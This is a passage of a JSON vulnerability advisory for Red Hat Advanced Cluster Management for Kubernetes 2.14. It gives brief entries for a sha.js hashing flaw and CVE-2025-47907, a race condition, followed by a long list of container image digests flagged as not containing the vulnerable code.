"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "sha.js: Missing type checks leading to hash rewind and passing on crafted data"
},
{
"cve": "CVE-2025-47907",
"cwe": {
"id": "CWE-362",
"name": "Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)"
},
"discovery_date": "2025-08-07T16:01:06.247481+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7566bd3c569a92b3540e44a31ef49e7dc9934254d457ec1e36d97824a1b7c82c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:fdd3dc61d0214588fdfdc0260cd75c395e02615bc73633d84184dee02effe404_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:47b07ed00366723b4063957769aaefc49b4bbcd4bcf14bf675b653db5a10ab01_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:c0ce3946e9aa446e8b8edca27e489ddd2dd7cf997da4951dce7d8be153ab5a08_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fe2a087063e5f7fb0b140e4b6b7631df3c6052e9c36659068a48631da4781a88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:08070208d69530bb849be1ac083d9f1affb1363232a2f589e839c09148c7bec0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b4cd50768238d29e719a60e98dba61d24ba70dd9d04d7410536ee629ec62c4fe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:c04d51be3f48aff9d8741b0e4be39497d89265b85f029487ab52440efe0f28f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1740b9e687e829ddc242fa400cf496ce94bdd875de8e9a83589f540231770016_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ba7ccd4485603b4ec39569b8e87122de610a6775f022f53e1150db0dbdbe2bcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:f87d0e73a50771c6ae322ba9aefc826a87910e3ffc64473a98ce197a30bd2647_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
